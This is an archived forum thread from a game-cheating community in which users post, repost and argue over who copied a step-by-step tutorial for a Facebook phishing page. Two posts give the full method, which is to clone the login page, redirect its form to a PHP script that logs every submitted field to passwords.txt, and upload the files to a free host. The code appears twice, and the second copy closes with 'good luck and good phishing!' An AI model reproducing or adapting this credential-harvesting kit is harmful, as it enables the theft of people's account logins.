| View previous topic :: View next topic |
| Author |
Message |
OhLAWD Expert Cheater
Reputation: 0
Joined: 21 Apr 2007 Posts: 208
|
Posted: Sun Feb 14, 2010 10:57 am Post subject: Facebook phising |
|
|
alright, First step is to go to www.facebook.com/login.php Right click some white space and select View Page Source, Or something similar. A Huge block of text will appear, Copy it all intot he notepad. Find: method="POST" action="https://login.facebook.com/login.php?login_attempt=1 and change it to method="GET" action="next.php"
Second step is to open up a blank notepad and write:
<?php
header(:Location" http://Facebook.com/logic.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
frwite($handle, $value);
fwrite($handle, \r\n");
}
fwrite($handle);
fclose($handle);
exit;
?>
Save it as "next.php"
Third step is to open a blank notepad (again) and save it as "passwords.txt" or whatever you named it in next.php. Leave it blank.
_________________
|
|
| Back to top |
|
 |
cokefag Master Cheater
Reputation: 51
Joined: 15 Nov 2007 Posts: 488
|
Posted: Sun Feb 14, 2010 11:04 am Post subject: Re: Facebook phising |
|
|
| OhLAWD wrote: | alright, First step is to go to www.facebook.com/login.php Right click some white space and select View Page Source, Or something similar. A Huge block of text will appear, Copy it all intot he notepad. Find: method="POST" action="https://login.facebook.com/login.php?login_attempt=1 and change it to method="GET" action="next.php"
Second step is to open up a blank notepad and write:
<?php
header(:Location" http://Facebook.com/logic.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
frwite($handle, $value);
fwrite($handle, \r\n");
}
fwrite($handle);
fclose($handle);
exit;
?>
Save it as "next.php"
Third step is to open a blank notepad (again) and save it as "passwords.txt" or whatever you named it in next.php. Leave it blank. |
Copied from a 2008/2007 thread in RS.
|
|
| Back to top |
|
 |
OhLAWD Expert Cheater
Reputation: 0
Joined: 21 Apr 2007 Posts: 208
|
Posted: Sun Feb 14, 2010 11:05 am Post subject: |
|
|
link post please.
_________________
|
|
| Back to top |
|
 |
To0k How do I cheat?
Reputation: 14
Joined: 16 Nov 2007 Posts: 0
|
Posted: Sun Feb 14, 2010 11:05 am Post subject: |
|
|
| Not that making a phising page is hard in the first place.
|
|
| Back to top |
|
 |
cokefag Master Cheater
Reputation: 51
Joined: 15 Nov 2007 Posts: 488
|
Posted: Sun Feb 14, 2010 11:06 am Post subject: |
|
|
Okay so im finally gonna make the tut, and before i start, i want to say that phishing facebook is different than phishing myspace!
Today we are going to make a phisher for facebook.
1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change "post" to "get"
Cool save the file, name it: index.php and save it to desktop but remember! where it says: "save as type" change it to "all files" this is very important
9) make a new file in notepad, and put this code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
10) now save it as lol.php and remember the save as file type to all files.
11) now, make a new file in notepad, dont write anything, save it as: passwords.txt
12) now upload all of them in www.t35.com
good luck and good phishing!
August 21st 2008
|
|
| Back to top |
|
 |
OhLAWD Expert Cheater
Reputation: 0
Joined: 21 Apr 2007 Posts: 208
|
Posted: Sun Feb 14, 2010 11:07 am Post subject: |
|
|
it differs.
_________________
|
|
| Back to top |
|
 |
cokefag Master Cheater
Reputation: 51
Joined: 15 Nov 2007 Posts: 488
|
Posted: Sun Feb 14, 2010 11:10 am Post subject: |
|
|
| OhLAWD wrote: | | it differs. |
It's the exact same guide.
|
|
| Back to top |
|
 |
19 Master Cheater
Reputation: 10
Joined: 08 Feb 2009 Posts: 451
|
Posted: Sun Feb 14, 2010 11:14 am Post subject: |
|
|
| I knew this was leeched, I had seen it before.
|
|
| Back to top |
|
 |
cokefag Master Cheater
Reputation: 51
Joined: 15 Nov 2007 Posts: 488
|
Posted: Sun Feb 14, 2010 11:17 am Post subject: |
|
|
| 19 wrote: | | I knew this was leeched, I had seen it before. |
Yeah I've seen many leeched topics in my day and I can tell by the sentences.
|
|
| Back to top |
|
 |
Benji Random spam moderator
Reputation: 4
Joined: 31 Dec 2007 Posts: 61 Location: The Netherlands
|
Posted: Sun Feb 14, 2010 11:21 am Post subject: |
|
|
Because cokefag is the first one to EVER post a Facebook phishing tutorial. Also, why would you want to hack your friends OR somebody's social networking page?
_________________
|
|
| Back to top |
|
 |
cokefag Master Cheater
Reputation: 51
Joined: 15 Nov 2007 Posts: 488
|
Posted: Sun Feb 14, 2010 11:22 am Post subject: |
|
|
| [/quote] wrote: | | Because cokefag is the first one to EVER post a Facebook phishing tutorial. Also, why would you want to hack your friends OR somebody's social networking page? |
It wasn't my topic.
|
|
| Back to top |
|
 |
|